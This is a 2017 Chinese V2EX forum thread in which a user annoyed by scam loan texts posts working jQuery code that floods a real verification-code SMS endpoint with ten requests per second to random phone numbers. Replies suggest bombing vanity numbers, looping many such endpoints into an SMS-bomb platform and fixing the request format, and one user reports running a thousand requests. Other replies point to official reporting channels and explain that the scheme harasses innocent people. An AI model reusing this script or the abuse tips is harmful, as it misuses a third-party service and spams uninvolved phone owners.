V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
这是一个专门讨论 idea 的地方。

每个人的时间,资源是有限的,有的时候你或许能够想到很多 idea,但是由于现实的限制,却并不是所有的 idea 都能够成为现实。

那这个时候,不妨可以把那些 idea 分享出来,启发别人。
shenqi
V2EX  ›  奇思妙想

给短信炸弹平台贡献接口。另外请指导怎么拒绝这拒绝骚扰短信。

  •  
  •   shenqi · 2017-07-31 11:43:54 +08:00 · 5722 次点击
    这是一个创建于 2672 天前的主题,其中的信息可能已经有所发展或是发生改变。

    我也不知道该怎么屏蔽这种破短信了。要不把 10690666 前缀的都屏蔽掉算了。

    信息里面的网址 :CcOgjKR/nc.t (为避免大家点进去,进行了 reverse,真要点的话,自己 reverse 一下: 'CcOgjKR/nc.t'.split('').reverse().join(''))

    这骚扰短信真坑爹。我就试试点进去看看怎么骗人吧。第一个页面就是填手机号收验证码的。

    看了下,短信接口随意跨域+不验证就发短信。爆破平台又多了一个接口。

    写了个随机刷接口的 js 版本。有 jquery 就黏贴进去就行(例如测网速专用的首页,还有测网速不上 bd 上 jd 的那个网站),写了一秒钟同时十条。

    (然并卵的目的:用光他的短信钱。)

    真想把这个挂载一些大流量的平台上面。刷爆他的短信。

    为避免误杀,我选择随机 17* 的号码段进行了。

    如果你的号码被不幸刚好被随机了,那真幸运,先说一句对不起。

    setInterval(() => {
      const random = parseInt(Math.random() * 1000000000);
      for(let i = 10; i--;) {
        $.post('https://chaoshi-api.jujinpan.cn/0.2/tool/send-verify-code', {
          mobile: 17000000000 + random + i,
          msg: '辣鸡广告,刷爆你的短信',
        });
      }
    }, 1000);
    

    http://wx3.sinaimg.cn/large/7108d0d3gy1fi2womtilij20jm0xq0w4.jpg

    33 条回复    2017-12-04 18:10:06 +08:00
    SingeeKing
        1
    SingeeKing  
       2017-07-31 11:48:18 +08:00
    我选择使用

    'CcOgjKR/nc.t'[::-1]
    clearbug
        2
    clearbug  
       2017-07-31 12:02:59 +08:00 via Android
    还能用不?等下回去轰炸下自己讨厌的人
    fangpeishi
        3
    fangpeishi  
       2017-07-31 12:14:59 +08:00   ❤️ 4
    如果用这个轰炸一下一些靓号,那些大佬很快就会去投诉,然后短信通道就会被关了的。
    13888888888
    13866666666
    13555555555
    。。。。
    anheiyouxia
        4
    anheiyouxia  
       2017-07-31 12:21:19 +08:00 via Android
    @clearbug 同一个号码最多发 6 条
    shenqi
        5
    shenqi  
    OP
       2017-07-31 12:21:42 +08:00
    @clearbug 炸不了,一个号码一分钟发一条,这个后台设定了。
    shenqi
        6
    shenqi  
    OP
       2017-07-31 12:21:59 +08:00
    @fangpeishi 好思路。
    shenqi
        7
    shenqi  
    OP
       2017-07-31 12:22:19 +08:00
    @SingeeKing 看不懂这是哪门语言的。
    doublleft
        8
    doublleft  
       2017-07-31 12:31:14 +08:00
    思路奇特。
    你不去举报垃圾短息,却跟人家验证码发送平台过意不去,而且还乱发短信。
    shenqi
        9
    shenqi  
    OP
       2017-07-31 12:33:39 +08:00
    @doublleft 不知道去哪里举报,求一条明路。
    anheiyouxia
        10
    anheiyouxia  
       2017-07-31 12:41:35 +08:00 via Android
    @shenqi 千万不要去 12321 举报,举报多了会有很多平台的验证码都收不到
    SingeeKing
        11
    SingeeKing  
       2017-07-31 12:53:58 +08:00
    @shenqi Python
    doublleft
        12
    doublleft  
       2017-07-31 13:31:26 +08:00
    @shenqi 12321,唯一且有效的官方途径
    tabris17
        13
    tabris17  
       2017-07-31 13:38:20 +08:00
    可以投诉这个短信网关,ISP 会关掉的
    shenqi
        14
    shenqi  
    OP
       2017-07-31 13:51:58 +08:00
    @anheiyouxia 我已经上去举报。要是很多平台收不到短信我就换一个小号咯。


    @doublleft 感谢提供。


    @tabris17 已经上 12321 举报。
    clearbug
        15
    clearbug  
       2017-07-31 15:00:08 +08:00
    奇怪,msg 可以请求中自己定义?
    shenqi
        16
    shenqi  
    OP
       2017-07-31 15:07:54 +08:00
    @clearbug msg 只是我用来让他们查看记录时候清楚知道干啥了而已。如果他们有存储的话。
    TigerK
        17
    TigerK  
       2017-07-31 15:17:40 +08:00
    举报到 12321,运营商就会屏蔽这个端口向你的手机发送短信了,收到垃圾邮件也可以到上面举报,让运营商直接把发信 IP 拉黑。嘻嘻~
    vipper
        18
    vipper  
       2017-07-31 15:30:11 +08:00
    通讯录白名单,可以拒绝掉这类短信
    ma125125t
        19
    ma125125t  
       2017-07-31 17:57:51 +08:00
    {
    "msg": "手机号码格式不正确",
    "code": 10001,
    "data": {
    "msg": "手机号码格式不正确",
    "code": 10001
    },
    "res": 0
    }
    zhanghk668
        20
    zhanghk668  
       2017-07-31 19:07:04 +08:00
    抓一批这种发短信的地址.做一个循环遍历批量发包.2333
    falcon05
        21
    falcon05  
       2017-07-31 19:09:27 +08:00 via iPhone
    你不是帮它推广了吗
    shenqi
        22
    shenqi  
    OP
       2017-08-01 09:38:30 +08:00
    @falcon05
    我发这个帖子的时候就想到有人这么想的。
    所以除了图片里面有那个信息,其他地方都没有。

    我知道 V 站的全部人员都是聪明的有钱人,不需要去借这种高利贷。
    shenqi
        23
    shenqi  
    OP
       2017-08-01 09:51:47 +08:00
    @zhanghk668 那样就能自己做短信爆破平台了。
    zhangneww
        24
    zhangneww  
       2017-08-01 10:06:44 +08:00
    楼主这思路很是清奇啊,自己被轰炸了,然后去轰炸别人? 170 号段果然低人一等。
    dacainiaoxe
        25
    dacainiaoxe  
       2017-08-01 14:31:05 +08:00
    @fangpeishi 老哥,没找到怎么点赞的方式,给你 10 个铜币,思路真的牛逼啊 哈哈哈哈哈
    KgM4gLtF0shViDH3
        26
    KgM4gLtF0shViDH3  
       2017-08-03 10:00:15 +08:00
    为什么都是手机号码格式不正确
    lynnX
        27
    lynnX  
       2017-08-03 16:28:50 +08:00
    BUG 还没修复 用自己的号码试了下 成功收到了验证短信
    timothyye
        28
    timothyye  
       2017-08-04 10:41:13 +08:00
    @bestkayle POST 的姿势没对,不是 RAW JSON,是 x-www-form-urlencoded
    KgM4gLtF0shViDH3
        29
    KgM4gLtF0shViDH3  
       2017-08-04 11:47:50 +08:00
    @timothyye #28 OK 了,这两天项目都用 json 传的。。。先跑个 1000 条。
    timothyye
        30
    timothyye  
       2017-08-04 12:43:37 +08:00
    @bestkayle 这……
    danieldong
        31
    danieldong  
       2017-08-07 15:34:29 +08:00
    没看懂呢,是说用这个就可以给随意讨厌的人疯狂发短信吗?
    dexin
        32
    dexin  
       2017-08-09 15:46:22 +08:00
    短信轰炸、短信炸弹,是指通过恶意程序,利用从各个网站上找到的动态短 URL (比如验证码发送的 URL)和 前端输入的被攻击者手机号码,发送 HTTP 请求,每次请求给用户发送一个动态的短信(比如验证码短信)。 最终的效果,就是朝许多无关的手机用户,发送很多验证码短信。导致手机用户被骚扰。
    so,你的做法就是自己被骚扰了,通过报复的方式刷光发短信的公司短信额度,后果就是数以万计的无辜号码被骚扰
    PS:现在稍微有些流量的网站都有做图形验证来防护这种恶意调用,所以你的想法不太容易实现
    正解就是投诉或者直接手机拉黑此号码,前者被动以后估计都收不到验证码短信了,或者主动,起码手机拦截里面可以看到验证码短信,当然苹果手机的话就另算了
    notgood
        33
    notgood  
       2017-12-04 18:10:06 +08:00 via iPhone
    @shenqi V 友 请问如何把 10690666 前缀的都屏蔽掉? 我也碰到跟你一样的短信骚扰。另外还有国外的电话骚扰,全是马尔代夫的号段请问有什么屏蔽办法吗?

    谢谢
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1180 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 23:59 · PVG 07:59 · LAX 15:59 · JFK 18:59
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.